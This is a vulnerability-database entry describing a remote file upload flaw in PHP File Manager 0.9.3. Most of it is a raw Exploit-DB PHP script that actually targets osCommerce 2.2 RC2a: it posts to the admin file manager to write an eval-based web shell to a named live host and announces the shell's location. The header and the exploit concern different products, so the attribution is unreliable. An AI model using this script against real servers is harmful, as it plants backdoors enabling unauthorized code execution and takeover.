PHP File Manager 0.9.3 Remote File Upload Vulnerability

vendor:

PHP File Manager

by:

milw0rm.com

7,5

CVSS

HIGH

Remote File Upload Vulnerability

434

CWE

Product Name: PHP File Manager

Affected Version From: 0.9.3

Affected Version To: 0.9.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP File Manager 0.9.3 Remote File Upload Vulnerability

PHP File Manager 0.9.3 is prone to a remote file-upload vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary PHP code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Upgrade to the latest version of PHP File Manager 0.9.3 or later.

Source

Exploit-DB raw data:

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n ã€puret_tã€ukã€toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]